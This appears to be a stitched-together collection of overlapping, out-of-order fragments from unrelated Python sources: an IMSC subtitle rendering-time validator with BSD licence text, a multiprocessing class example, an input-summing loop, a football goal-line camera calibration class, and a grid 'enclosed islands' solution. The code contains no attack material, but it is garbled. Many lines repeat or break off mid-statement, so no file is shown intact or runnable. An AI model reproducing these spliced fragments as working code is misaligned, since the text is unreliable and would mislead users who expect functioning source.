"DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR",
") if glyph in front_buffer: self.isd_stats.dur_t += nrga / _compute_gcpy(char) self.isd_stats.gcpy_count += 1",
"0x9FFF else _REN_G_OTHER def _compute_gcpy(char: str): if len(char) != 1: raise ValueError(\"Argument must",
"int ): front_buffer = set() if isd is not None: for region in",
"RuntimeError(f\"Unsupported extent height units: {region_extent.height.units}\") return region_extent.width.value * region_extent.height.value / 10000 def _is_presented_region(region:",
"_compute_nrga(element: typing.Type[ttconv.model.Text]): font_size: styles.LengthType = element.parent().get_style(styles.StyleProperties.FontSize) if font_size.units is not styles.LengthType.Units.rh: raise RuntimeError(f\"Unsupported",
"the root container had to be cleared dur_t: Number = 0 # HRM",
"NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR # ANY",
"should span and br really be included -> yes for now # should",
"distribution. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS",
"IMSC HRM. `isd_iterator` returns a sequence of tuplets `(begin, ISD)`, where `ISD` is",
"for element in region.dfs_iterator(): # should body elements really be excluded? -> NO",
"fractions import Fraction from numbers import Number import logging import ttconv.isd import ttconv.style_properties",
"last_offset: raise RuntimeError(\"ISDs are not in order of increasing offset\") stats = hrm.next_isd(isd,",
"): self.isd_stats.is_empty = True draw_area = 0 if index_n == 0 or is_last_isd_empty",
"# # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS",
"IS\" AND # ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,",
"NO # should span and br really be included -> yes for now",
"ttconv.model.Text): continue parent = element.parent() nrga = _compute_nrga(element) for char in element.get_text(): glyph",
"backgrounds really be counted? -> NO # should span and br really be",
"# Number of backgrounds drawn clear: bool = False # Whether the root",
"binary form must reproduce the above copyright notice, # this list of conditions",
"= _compute_nrga(element) for char in element.get_text(): glyph = _Glyph( char=char, color=parent.get_style(styles.StyleProperties.Color), font_family=parent.get_style(styles.StyleProperties.FontFamily), font_size=parent.get_style(styles.StyleProperties.FontSize),",
"Fraction from numbers import Number import logging import ttconv.isd import ttconv.style_properties as styles",
"0.6 _REN_G_OTHER = 1.2 _NGBS = 1 _IPD = 1 @dataclass class ISDStatistics:",
"= 0 # Number of backgrounds drawn clear: bool = False # Whether",
"font_family: typing.Tuple[typing.Union[str, styles.GenericFontFamilyType]] font_size: styles.LengthType font_style: styles.FontStyleType font_weight: styles.FontWeightType text_decoration: styles.TextDecorationType text_outline: styles.TextOutlineType",
"isd.iter_regions(): if not _is_presented_region(region): continue for element in region.dfs_iterator(): if not isinstance(element, ttconv.model.Text):",
"is_empty: bool = False # Does the ISD contain any content class EventHandler:",
"following disclaimer in the documentation # and/or other materials provided with the distribution.",
"text drawing time ngra_t: Number = 0 # Total Normalized Rendered Glyph Area",
"available_time: Fraction, stats: ISDStatistics): LOGGER.warning(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def error(self, msg: str,",
"conform to the IMSC HRM. `isd_iterator` returns a sequence of tuplets `(begin, ISD)`,",
"starts at `begin` seconds and ends immediately before the `begin` value of the",
"dataclasses import dataclass from fractions import Fraction from numbers import Number import logging",
"for doc_index, (time_offset, isd) in enumerate(isd_iterator): if time_offset < last_offset: raise RuntimeError(\"ISDs are",
"callbacks on the `event_handler`. ''' hrm = HRM() last_offset = 0 is_last_isd_empty =",
"1: event_handler.error(\"NGBS exceeded\", doc_index, time_offset, avail_render_time, stats) event_handler.debug(\"Processed document\", doc_index, time_offset, avail_render_time, stats)",
"None: for region in isd.iter_regions(): if not _is_presented_region(region): continue self.isd_stats.is_empty = False nbg",
"for now # should br really be included -> no if isinstance(element, ttconv.model.Br):",
"stats = hrm.next_isd(isd, doc_index, is_last_isd_empty) avail_render_time = _IPD if doc_index == 0 else",
"nrga / _compute_gcpy(char) self.isd_stats.gcpy_count += 1 elif glyph in self.back_buffer: self.isd_stats.dur_t += nrga",
"BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; # LOSS OF",
"form must reproduce the above copyright notice, # this list of conditions and",
"= 0 # HRM background drawing time nbg_total: Number = 0 # Number",
"any content class EventHandler: '''Allows a callee to inform the caller of events",
"continue for element in region.dfs_iterator(): if not isinstance(element, ttconv.model.Text): continue parent = element.parent()",
"of events that occur during processing. Typically overridden by the caller. ''' @staticmethod",
"Fraction, stats: ISDStatistics): LOGGER.error(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def debug(self, msg: str, doc_index:",
"= draw_area != 0 if isd is not None: for region in isd.iter_regions():",
"typing.Tuple[typing.Union[str, styles.GenericFontFamilyType]] font_size: styles.LengthType font_style: styles.FontStyleType font_weight: styles.FontWeightType text_decoration: styles.TextDecorationType text_outline: styles.TextOutlineType text_shadow:",
"LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT",
"isd) in enumerate(isd_iterator): if time_offset < last_offset: raise RuntimeError(\"ISDs are not in order",
"# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT",
"self.isd_stats.dur_d = draw_area / _BDRAW def _compute_dur_t( self, isd: typing.Type[ttconv.isd.ISD], _index_n: int ):",
"WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE # DISCLAIMED. IN",
"!= 0 if isd is not None: for region in isd.iter_regions(): if not",
"self.isd_stats.nbg_total += nbg self.isd_stats.dur_d = draw_area / _BDRAW def _compute_dur_t( self, isd: typing.Type[ttconv.isd.ISD],",
"IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND # ANY",
"{stats.gcpy_count} | render count: {stats.gren_count} | Background draw count: {stats.nbg_total} | Clear: {stats.clear}\\n\"",
"raise RuntimeError(\"ISDs are not in order of increasing offset\") stats = hrm.next_isd(isd, doc_index,",
"Number = 0 # HRM text drawing time ngra_t: Number = 0 #",
"IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR #",
"OR CONSEQUENTIAL DAMAGES # (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS",
"number of glyphs copied gren_count: Number = 0 # Total number of glyphs",
"ISDStatistics: dur: Number = 0 # HRM ISD time dur_d: Number = 0",
"if bg_color is not None: if bg_color.ident is not styles.ColorType.Colorimetry.RGBA8: raise RuntimeError(f\"Unsupported colorimetry",
"LOGGER.error(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def debug(self, msg: str, doc_index: int, time_offset: Fraction,",
"in GCPY_12 else _GCPY_OTHER def _region_normalized_size(region: typing.Type[ttconv.isd.ISD.Region]): region_extent: styles.ExtentType = region.get_style(styles.StyleProperties.Extent) if region_extent.width.units",
"from fractions import Fraction from numbers import Number import logging import ttconv.isd import",
"`isd_iterator` returns a sequence of tuplets `(begin, ISD)`, where `ISD` is an ISD",
"# modification, are permitted provided that the following conditions are met: # #",
"front_buffer: self.isd_stats.dur_t += nrga / _compute_gcpy(char) self.isd_stats.gcpy_count += 1 elif glyph in self.back_buffer:",
"1 else: self.isd_stats.dur_t += nrga / _compute_ren_g(char) self.isd_stats.ngra_t += nrga self.isd_stats.gren_count += 1",
"is_last_isd_empty: bool ) -> ISDStatistics: self.isd_stats = ISDStatistics() self._compute_dur_t(isd, index_n) self._compute_dur_d(isd, index_n, is_last_isd_empty)",
"available_time: Fraction, stats: ISDStatistics): LOGGER.error(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def debug(self, msg: str,",
"continue self.isd_stats.is_empty = False nbg = 0 for element in region.dfs_iterator(): # should",
"HRM. `isd_iterator` returns a sequence of tuplets `(begin, ISD)`, where `ISD` is an",
"of the next ISD. Errors, warnings and info messages are signalled through callbacks",
"font_style=parent.get_style(styles.StyleProperties.FontStyle), font_weight=parent.get_style(styles.StyleProperties.FontWeight), text_decoration=parent.get_style(styles.StyleProperties.TextDecoration), text_outline=parent.get_style(styles.StyleProperties.TextOutline), text_shadow=parent.get_style(styles.StyleProperties.TextShadow), background_color=parent.get_style(styles.StyleProperties.BackgroundColor) ) if glyph in front_buffer: self.isd_stats.dur_t +=",
"= 1 @dataclass class ISDStatistics: dur: Number = 0 # HRM ISD time",
"LOGGER.debug(EventHandler._format_message(msg, doc_index, time_offset, available_time, stats)) def validate(isd_iterator: typing.Iterator[typing.Tuple[Fraction, ttconv.isd.ISD]], event_handler: typing.Type[EventHandler]=EventHandler()): '''Determines whether",
"msg: str, doc_index: int, time_offset: Fraction, available_time: Fraction, stats: ISDStatistics): LOGGER.warning(EventHandler._format_message(msg, doc_index, time_offset,",
"last_offset if stats.dur > avail_render_time: event_handler.error(\"Rendering time exceeded\", doc_index, time_offset, avail_render_time, stats) if"
] |
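To make the validator's contract concrete, here is a minimal usage sketch, not part of the source above: it drives validate() with a custom EventHandler that collects errors instead of logging them. The module name imsc_hrm is an assumption for illustration, and None stands in for an empty ISD, a case next_isd() handles explicitly.

from fractions import Fraction

import imsc_hrm  # assumed module name for the HRM source above

class CollectingHandler(imsc_hrm.EventHandler):
  '''Collects HRM violations instead of logging them.'''

  def __init__(self):
    self.errors = []

  def error(self, msg, doc_index, time_offset, available_time, stats):
    self.errors.append((msg, doc_index, float(time_offset)))

# validate() consumes (begin, ISD) tuples in increasing order of begin;
# None models an empty ISD here, so no violations are expected.
handler = CollectingHandler()
imsc_hrm.validate([(Fraction(0), None), (Fraction(2), None)], handler)
print(handler.errors)  # -> []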
# Source: chaofan-zheng/python_learning_code
"""
Custom process class
"""
from multiprocessing import Process

# Use the object-oriented approach to create your own process class
class MyProcess(Process):
    def __init__(self, value):
        self.value = value
        super().__init__()  # initialize the parent class

    def fun(self):
        print(self.value)

    # run() is the entry point for the work the process executes
    def run(self):
        self.fun()
        print("Do something big, do whatever you want")


if __name__ == "__main__":  # guard required on platforms that spawn processes
    my_process = MyProcess(3)
    # Start the process; execution enters through the run() entry point
    my_process.start()
    my_process.join()

# Rough sketch of what Process does internally:
# class Process:
#     def __init__(self, target):
#         self._target = target
#
#     def run(self):
#         self._target()
#
#     def start(self):
#         # create the process
#         self.run()
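For contrast, the same work can be expressed without subclassing by handing Process a target callable; this is a minimal sketch using only the standard multiprocessing API.

from multiprocessing import Process

def fun(value):
    print(value)

if __name__ == "__main__":
    p = Process(target=fun, args=(3,))  # the default run() calls fun(3)
    p.start()
    p.join()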
soma = cont = 0
while True:
    numero = int(input('Enter an integer (type 999 to stop): '))
    if numero == 999:
        break
    soma = soma + numero
    cont += 1
print(f'The sum of the {cont} numbers entered is {soma}')
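A small hardening variant, not in the original: rejecting non-numeric input instead of crashing on it. Only the try/except around int() is new; the sentinel logic is unchanged.

soma = cont = 0
while True:
    entrada = input('Enter an integer (type 999 to stop): ')
    try:
        numero = int(entrada)
    except ValueError:
        print(f'"{entrada}" is not an integer, try again.')
        continue
    if numero == 999:
        break
    soma += numero
    cont += 1
print(f'The sum of the {cont} numbers entered is {soma}')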
import os

import numpy as np

from interface.camera_calibration import ModelImage

dir_path = os.path.dirname(os.path.realpath(__file__))


class FootballManCityCourtImage2(ModelImage):

    def __init__(self):
        alpha = 13000
        # Camera intrinsic matrix: focal length alpha, principal point (800, 400)
        self.K = np.matrix([[alpha, 0.0, 800],
                            [0.0, alpha, 400],
                            [0.0, 0.0, 1.0]])
        # Currently not used
        self.distortion_coeff = None
        self.lines = None
        self.lines_img_ga = None
        self.img_name = os.path.join(dir_path, "rgb_goal_line_MCity_2.png")

    def set_lines(self):
        # Homogeneous image coordinates of the goal landmarks
        goal_bot_left_corner = np.array([162, 466, 1])
        goal_bot_right_corner = np.array([932, 436, 1])
        goal_top_left_corner = np.array([698, 111, 1])
        goal_top_right_corner = np.array([1442, 110, 1])
        goal_left_back_corner = np.array([1, 141, 1])
        goal_right_back_corner = np.array([721, 37, 1])

        # keeper_box_back_left = np.array([keeper_box_width/2, 0, backline, 1])
        keeper_box_back_right = np.array([1421, 419, 1])
        # keeper_box_front_left = np.array([keeper_box_width/2, 0, backline - keeper_box_depth, 1])
        keeper_box_front_right = np.array([1592, 732, 1])

        penalty_area_back_left = np.array([1, 465, 1])
        penalty_area_back_right = np.array([1592, 408, 1])
        # penalty_area_front_left =
        # penalty_area_front_right =

        # Each line is a pair of endpoints
        back_line = (penalty_area_back_left, penalty_area_back_right)
        goal_top_bar = (goal_top_left_corner, goal_top_right_corner)
        goal_left_bar = (goal_bot_left_corner, goal_top_left_corner)
        goal_right_bar = (goal_bot_right_corner, goal_top_right_corner)
        goal_left_back_line = (goal_bot_left_corner, goal_left_back_corner)
        goal_right_back_line = (goal_bot_right_corner, goal_right_back_corner)
        # keeper_box_left_line = (keeper_box_back_left, keeper_box_front_left)
        keeper_box_right_line = (keeper_box_back_right, keeper_box_front_right)
        # keeper_box_front_line = (keeper_box_front_left, keeper_box_front_right)
        # penalty_box_left_line = (penalty_area_back_left, penalty_area_front_left)
        # penalty_box_right_line = (penalty_area_back_right, penalty_area_front_right)
        # penalty_box_front_line = (penalty_area_front_left, penalty_area_front_right)

        goal_lines = {"back_line": back_line,
                      "goal_top_bar": goal_top_bar,
                      "goal_left_bar": goal_left_bar,
                      "goal_right_bar": goal_right_bar,
                      "goal_left_back_line": goal_left_back_line,
                      "goal_right_back_line": goal_right_back_line}
        keeper_box_lines = {"keeper_box_right_line": keeper_box_right_line}
        penalty_box_lines = {}
        self.lines = {**goal_lines, **keeper_box_lines, **penalty_box_lines}
"self.lines_img_ga = None self.img_name = os.path.join(dir_path, \"rgb_goal_line_MCity_2.png\") def set_lines(self): goal_bot_left_corner = np.array([162 ,",
"(keeper_box_front_left, keeper_box_front_right) #penalty_box_left_line = (penalty_area_back_left, penalty_area_front_left) #penalty_box_right_line = (penalty_area_back_right, penalty_area_front_right) #penalty_box_front_line = (penalty_area_front_left,",
"np from interface.camera_calibration import ModelImage dir_path = os.path.dirname(os.path.realpath(__file__)) class FootballManCityCourtImage2(ModelImage): def __init__(self): alpha",
"1]) goal_right_back_corner = np.array([721, 37, 1]) #keeper_box_back_left = np.array([ keeper_box_width/2, 0, backline, 1])",
"0, backline, 1]) keeper_box_back_right = np.array([1421, 419, 1]) #keeper_box_front_left = np.array([ keeper_box_width/2, 0,",
"goal_left_bar, \"goal_right_bar\": goal_right_bar, \"goal_left_back_line\": goal_left_back_line, \"goal_right_back_line\": goal_right_back_line} keeper_box_lines = {\"keeper_box_right_line\": keeper_box_right_line} penalty_box_lines =",
"as np from interface.camera_calibration import ModelImage dir_path = os.path.dirname(os.path.realpath(__file__)) class FootballManCityCourtImage2(ModelImage): def __init__(self):",
"1]) goal_bot_right_corner = np.array([932, 436, 1]) goal_top_left_corner = np.array([698 , 111, 1]) goal_top_right_corner",
"#Currently not used self.distortion_coeff = None self.lines = None self.lines_img_ga = None self.img_name",
"keeper_box_lines = {\"keeper_box_right_line\": keeper_box_right_line} penalty_box_lines = {} self.lines = {**goal_lines, **keeper_box_lines, **penalty_box_lines} return",
"= np.array([698 , 111, 1]) goal_top_right_corner = np.array([1442, 110, 1]) goal_left_back_corner = np.array([1,",
", 466, 1]) goal_bot_right_corner = np.array([932, 436, 1]) goal_top_left_corner = np.array([698 , 111,",
"goal_right_bar, \"goal_left_back_line\": goal_left_back_line, \"goal_right_back_line\": goal_right_back_line} keeper_box_lines = {\"keeper_box_right_line\": keeper_box_right_line} penalty_box_lines = {} self.lines",
"= 13000 self.K = np.matrix([[alpha, 0.0, 800], [0.0, alpha, 400], [0.0, 0.0, 1.0]])",
"keeper_box_front_right) #penalty_box_left_line = (penalty_area_back_left, penalty_area_front_left) #penalty_box_right_line = (penalty_area_back_right, penalty_area_front_right) #penalty_box_front_line = (penalty_area_front_left, penalty_area_front_right)",
"goal_left_back_line, \"goal_right_back_line\": goal_right_back_line} keeper_box_lines = {\"keeper_box_right_line\": keeper_box_right_line} penalty_box_lines = {} self.lines = {**goal_lines,",
"= back_line = (penalty_area_back_left, penalty_area_back_right) goal_top_bar = (goal_top_left_corner, goal_top_right_corner) goal_left_bar = (goal_bot_left_corner, goal_top_left_corner)",
"= np.array([1, 141, 1]) goal_right_back_corner = np.array([721, 37, 1]) #keeper_box_back_left = np.array([ keeper_box_width/2,",
"1]) penalty_area_back_left = np.array([ 1, 465, 1]) penalty_area_back_right = np.array([1592, 408, 1]) #penalty_area_front_left",
"= np.array([721, 37, 1]) #keeper_box_back_left = np.array([ keeper_box_width/2, 0, backline, 1]) keeper_box_back_right =",
"os.path.dirname(os.path.realpath(__file__)) class FootballManCityCourtImage2(ModelImage): def __init__(self): alpha = 13000 self.K = np.matrix([[alpha, 0.0, 800],",
", 111, 1]) goal_top_right_corner = np.array([1442, 110, 1]) goal_left_back_corner = np.array([1, 141, 1])",
"np.array([1421, 419, 1]) #keeper_box_front_left = np.array([ keeper_box_width/2, 0, backline - keeper_box_depth, 1]) keeper_box_front_right",
"(goal_bot_left_corner, goal_top_left_corner) goal_right_bar = (goal_bot_right_corner, goal_top_right_corner) goal_left_back_line = (goal_bot_left_corner, goal_left_back_corner) goal_right_back_line = (goal_bot_right_corner,",
"= np.array([1421, 419, 1]) #keeper_box_front_left = np.array([ keeper_box_width/2, 0, backline - keeper_box_depth, 1])",
"419, 1]) #keeper_box_front_left = np.array([ keeper_box_width/2, 0, backline - keeper_box_depth, 1]) keeper_box_front_right =",
"np.array([ 1, 465, 1]) penalty_area_back_right = np.array([1592, 408, 1]) #penalty_area_front_left = #penalty_area_front_right =",
"1]) #keeper_box_front_left = np.array([ keeper_box_width/2, 0, backline - keeper_box_depth, 1]) keeper_box_front_right = np.array([1592,",
"np.array([932, 436, 1]) goal_top_left_corner = np.array([698 , 111, 1]) goal_top_right_corner = np.array([1442, 110,",
"0, backline - keeper_box_depth, 1]) keeper_box_front_right = np.array([1592, 732, 1]) penalty_area_back_left = np.array([",
"= (keeper_box_back_left, keeper_box_front_left) keeper_box_right_line = (keeper_box_back_right, keeper_box_front_right) #keeper_box_front_line = (keeper_box_front_left, keeper_box_front_right) #penalty_box_left_line =",
"= (penalty_area_back_left, penalty_area_front_left) #penalty_box_right_line = (penalty_area_back_right, penalty_area_front_right) #penalty_box_front_line = (penalty_area_front_left, penalty_area_front_right) goal_lines =",
"goal_top_right_corner) goal_left_bar = (goal_bot_left_corner, goal_top_left_corner) goal_right_bar = (goal_bot_right_corner, goal_top_right_corner) goal_left_back_line = (goal_bot_left_corner, goal_left_back_corner)",
"= (penalty_area_back_left, penalty_area_back_right) goal_top_bar = (goal_top_left_corner, goal_top_right_corner) goal_left_bar = (goal_bot_left_corner, goal_top_left_corner) goal_right_bar =",
"penalty_area_back_right) goal_top_bar = (goal_top_left_corner, goal_top_right_corner) goal_left_bar = (goal_bot_left_corner, goal_top_left_corner) goal_right_bar = (goal_bot_right_corner, goal_top_right_corner)",
"goal_right_back_line = (goal_bot_right_corner, goal_right_back_corner) #keeper_box_left_line = (keeper_box_back_left, keeper_box_front_left) keeper_box_right_line = (keeper_box_back_right, keeper_box_front_right) #keeper_box_front_line",
"np.array([1592, 408, 1]) #penalty_area_front_left = #penalty_area_front_right = back_line = (penalty_area_back_left, penalty_area_back_right) goal_top_bar =",
"465, 1]) penalty_area_back_right = np.array([1592, 408, 1]) #penalty_area_front_left = #penalty_area_front_right = back_line =",
"110, 1]) goal_left_back_corner = np.array([1, 141, 1]) goal_right_back_corner = np.array([721, 37, 1]) #keeper_box_back_left",
"{\"back_line\": back_line, \"goal_top_bar\": goal_top_bar, \"goal_left_bar\" : goal_left_bar, \"goal_right_bar\": goal_right_bar, \"goal_left_back_line\": goal_left_back_line, \"goal_right_back_line\": goal_right_back_line}",
"= np.array([1592, 732, 1]) penalty_area_back_left = np.array([ 1, 465, 1]) penalty_area_back_right = np.array([1592,",
"goal_right_back_line} keeper_box_lines = {\"keeper_box_right_line\": keeper_box_right_line} penalty_box_lines = {} self.lines = {**goal_lines, **keeper_box_lines, **penalty_box_lines}",
"<gh_stars>1-10 import os import numpy as np from interface.camera_calibration import ModelImage dir_path =",
"(keeper_box_back_right, keeper_box_front_right) #keeper_box_front_line = (keeper_box_front_left, keeper_box_front_right) #penalty_box_left_line = (penalty_area_back_left, penalty_area_front_left) #penalty_box_right_line = (penalty_area_back_right,",
"None self.lines = None self.lines_img_ga = None self.img_name = os.path.join(dir_path, \"rgb_goal_line_MCity_2.png\") def set_lines(self):",
"#penalty_area_front_left = #penalty_area_front_right = back_line = (penalty_area_back_left, penalty_area_back_right) goal_top_bar = (goal_top_left_corner, goal_top_right_corner) goal_left_bar",
"#keeper_box_front_line = (keeper_box_front_left, keeper_box_front_right) #penalty_box_left_line = (penalty_area_back_left, penalty_area_front_left) #penalty_box_right_line = (penalty_area_back_right, penalty_area_front_right) #penalty_box_front_line",
"keeper_box_width/2, 0, backline - keeper_box_depth, 1]) keeper_box_front_right = np.array([1592, 732, 1]) penalty_area_back_left =",
"(keeper_box_back_left, keeper_box_front_left) keeper_box_right_line = (keeper_box_back_right, keeper_box_front_right) #keeper_box_front_line = (keeper_box_front_left, keeper_box_front_right) #penalty_box_left_line = (penalty_area_back_left,",
"np.array([ keeper_box_width/2, 0, backline - keeper_box_depth, 1]) keeper_box_front_right = np.array([1592, 732, 1]) penalty_area_back_left",
"def __init__(self): alpha = 13000 self.K = np.matrix([[alpha, 0.0, 800], [0.0, alpha, 400],",
"= None self.img_name = os.path.join(dir_path, \"rgb_goal_line_MCity_2.png\") def set_lines(self): goal_bot_left_corner = np.array([162 , 466,",
"= {\"keeper_box_right_line\": keeper_box_right_line} penalty_box_lines = {} self.lines = {**goal_lines, **keeper_box_lines, **penalty_box_lines} return self.lines",
"732, 1]) penalty_area_back_left = np.array([ 1, 465, 1]) penalty_area_back_right = np.array([1592, 408, 1])",
"np.array([1, 141, 1]) goal_right_back_corner = np.array([721, 37, 1]) #keeper_box_back_left = np.array([ keeper_box_width/2, 0,",
"backline - keeper_box_depth, 1]) keeper_box_front_right = np.array([1592, 732, 1]) penalty_area_back_left = np.array([ 1,",
"= np.array([ keeper_box_width/2, 0, backline, 1]) keeper_box_back_right = np.array([1421, 419, 1]) #keeper_box_front_left =",
"goal_bot_right_corner = np.array([932, 436, 1]) goal_top_left_corner = np.array([698 , 111, 1]) goal_top_right_corner =",
"= (penalty_area_front_left, penalty_area_front_right) goal_lines = {\"back_line\": back_line, \"goal_top_bar\": goal_top_bar, \"goal_left_bar\" : goal_left_bar, \"goal_right_bar\":",
"436, 1]) goal_top_left_corner = np.array([698 , 111, 1]) goal_top_right_corner = np.array([1442, 110, 1])",
"class FootballManCityCourtImage2(ModelImage): def __init__(self): alpha = 13000 self.K = np.matrix([[alpha, 0.0, 800], [0.0,"
] |
[
"dfs.pop() escapable += 1 for nr,nc in [[cr+1,cc],[cr-1,cc],[cr,cc+1],[cr,cc-1]]: if 0<=nr<len(matrix) and 0<=nc<len(matrix[0]) and",
"0<=nr<len(matrix) and 0<=nc<len(matrix[0]) and (nr,nc) not in seen and matrix[nr][nc] == 1: dfs.append([nr,nc])",
"0 seen = set() for r in range(len(matrix)): for c in [0,len(matrix[0])-1]: if",
"in seen or matrix[r][c] != 1: continue seen.add((r,c)) dfs = [[r,c]] while dfs:",
"matrix) escapable = 0 seen = set() for r in range(len(matrix)): for c",
"and (nr,nc) not in seen and matrix[nr][nc] == 1: dfs.append([nr,nc]) seen.add((nr,nc)) return total",
"matrix): total = sum(sum(row) for row in matrix) escapable = 0 seen =",
"in matrix) escapable = 0 seen = set() for r in range(len(matrix)): for",
"and matrix[nr][nc] == 1: dfs.append([nr,nc]) seen.add((nr,nc)) for r in [0,len(matrix)-1]: for c in",
"row in matrix) escapable = 0 seen = set() for r in range(len(matrix)):",
"[0,len(matrix)-1]: for c in range(len(matrix[0])): if (r,c) in seen or matrix[r][c] != 1:",
"+= 1 for nr,nc in [[cr+1,cc],[cr-1,cc],[cr,cc+1],[cr,cc-1]]: if 0<=nr<len(matrix) and 0<=nc<len(matrix[0]) and (nr,nc) not",
"in [[cr+1,cc],[cr-1,cc],[cr,cc+1],[cr,cc-1]]: if 0<=nr<len(matrix) and 0<=nc<len(matrix[0]) and (nr,nc) not in seen and matrix[nr][nc]",
"and 0<=nc<len(matrix[0]) and (nr,nc) not in seen and matrix[nr][nc] == 1: dfs.append([nr,nc]) seen.add((nr,nc))",
"for c in range(len(matrix[0])): if (r,c) in seen or matrix[r][c] != 1: continue",
"= 0 seen = set() for r in range(len(matrix)): for c in [0,len(matrix[0])-1]:",
"seen.add((nr,nc)) for r in [0,len(matrix)-1]: for c in range(len(matrix[0])): if (r,c) in seen",
"seen and matrix[nr][nc] == 1: dfs.append([nr,nc]) seen.add((nr,nc)) for r in [0,len(matrix)-1]: for c",
"and (nr,nc) not in seen and matrix[nr][nc] == 1: dfs.append([nr,nc]) seen.add((nr,nc)) for r",
"= dfs.pop() escapable += 1 for nr,nc in [[cr+1,cc],[cr-1,cc],[cr,cc+1],[cr,cc-1]]: if 0<=nr<len(matrix) and 0<=nc<len(matrix[0])",
"for nr,nc in [[cr+1,cc],[cr-1,cc],[cr,cc+1],[cr,cc-1]]: if 0<=nr<len(matrix) and 0<=nc<len(matrix[0]) and (nr,nc) not in seen",
"nr,nc in [[cr+1,cc],[cr-1,cc],[cr,cc+1],[cr,cc-1]]: if 0<=nr<len(matrix) and 0<=nc<len(matrix[0]) and (nr,nc) not in seen and",
"[0,len(matrix[0])-1]: if (r,c) in seen or matrix[r][c] != 1: continue seen.add((r,c)) dfs =",
"1 for nr,nc in [[cr+1,cc],[cr-1,cc],[cr,cc+1],[cr,cc-1]]: if 0<=nr<len(matrix) and 0<=nc<len(matrix[0]) and (nr,nc) not in",
"[[cr+1,cc],[cr-1,cc],[cr,cc+1],[cr,cc-1]]: if 0<=nr<len(matrix) and 0<=nc<len(matrix[0]) and (nr,nc) not in seen and matrix[nr][nc] ==",
"in seen and matrix[nr][nc] == 1: dfs.append([nr,nc]) seen.add((nr,nc)) for r in [0,len(matrix)-1]: for",
"!= 1: continue seen.add((r,c)) dfs = [[r,c]] while dfs: cr,cc = dfs.pop() escapable",
"Enclosed Islands.py class Solution: def solve(self, matrix): total = sum(sum(row) for row in",
"if 0<=nr<len(matrix) and 0<=nc<len(matrix[0]) and (nr,nc) not in seen and matrix[nr][nc] == 1:",
"continue seen.add((r,c)) dfs = [[r,c]] while dfs: cr,cc = dfs.pop() escapable += 1",
"def solve(self, matrix): total = sum(sum(row) for row in matrix) escapable = 0",
"(nr,nc) not in seen and matrix[nr][nc] == 1: dfs.append([nr,nc]) seen.add((nr,nc)) return total -",
"range(len(matrix)): for c in [0,len(matrix[0])-1]: if (r,c) in seen or matrix[r][c] != 1:",
"in [0,len(matrix[0])-1]: if (r,c) in seen or matrix[r][c] != 1: continue seen.add((r,c)) dfs",
"in [0,len(matrix)-1]: for c in range(len(matrix[0])): if (r,c) in seen or matrix[r][c] !=",
"not in seen and matrix[nr][nc] == 1: dfs.append([nr,nc]) seen.add((nr,nc)) return total - escapable",
"dfs = [[r,c]] while dfs: cr,cc = dfs.pop() escapable += 1 for nr,nc",
"set() for r in range(len(matrix)): for c in [0,len(matrix[0])-1]: if (r,c) in seen",
"c in [0,len(matrix[0])-1]: if (r,c) in seen or matrix[r][c] != 1: continue seen.add((r,c))",
"0<=nc<len(matrix[0]) and (nr,nc) not in seen and matrix[nr][nc] == 1: dfs.append([nr,nc]) seen.add((nr,nc)) for",
"(r,c) in seen or matrix[r][c] != 1: continue seen.add((r,c)) dfs = [[r,c]] while",
"seen.add((r,c)) dfs = [[r,c]] while dfs: cr,cc = dfs.pop() escapable += 1 for",
"(nr,nc) not in seen and matrix[nr][nc] == 1: dfs.append([nr,nc]) seen.add((nr,nc)) for r in",
"= set() for r in range(len(matrix)): for c in [0,len(matrix[0])-1]: if (r,c) in",
"<filename>0845 Enclosed Islands.py class Solution: def solve(self, matrix): total = sum(sum(row) for row",
"= sum(sum(row) for row in matrix) escapable = 0 seen = set() for",
"for r in range(len(matrix)): for c in [0,len(matrix[0])-1]: if (r,c) in seen or",
"solve(self, matrix): total = sum(sum(row) for row in matrix) escapable = 0 seen",
"= [[r,c]] while dfs: cr,cc = dfs.pop() escapable += 1 for nr,nc in",
"escapable += 1 for nr,nc in [[cr+1,cc],[cr-1,cc],[cr,cc+1],[cr,cc-1]]: if 0<=nr<len(matrix) and 0<=nc<len(matrix[0]) and (nr,nc)",
"or matrix[r][c] != 1: continue seen.add((r,c)) dfs = [[r,c]] while dfs: cr,cc =",
"1: dfs.append([nr,nc]) seen.add((nr,nc)) for r in [0,len(matrix)-1]: for c in range(len(matrix[0])): if (r,c)",
"for r in [0,len(matrix)-1]: for c in range(len(matrix[0])): if (r,c) in seen or",
"Solution: def solve(self, matrix): total = sum(sum(row) for row in matrix) escapable =",
"r in [0,len(matrix)-1]: for c in range(len(matrix[0])): if (r,c) in seen or matrix[r][c]",
"class Solution: def solve(self, matrix): total = sum(sum(row) for row in matrix) escapable",
"c in range(len(matrix[0])): if (r,c) in seen or matrix[r][c] != 1: continue seen.add((r,c))",
"cr,cc = dfs.pop() escapable += 1 for nr,nc in [[cr+1,cc],[cr-1,cc],[cr,cc+1],[cr,cc-1]]: if 0<=nr<len(matrix) and",
"for c in [0,len(matrix[0])-1]: if (r,c) in seen or matrix[r][c] != 1: continue",
"1: continue seen.add((r,c)) dfs = [[r,c]] while dfs: cr,cc = dfs.pop() escapable +=",
"if (r,c) in seen or matrix[r][c] != 1: continue seen.add((r,c)) dfs = [[r,c]]",
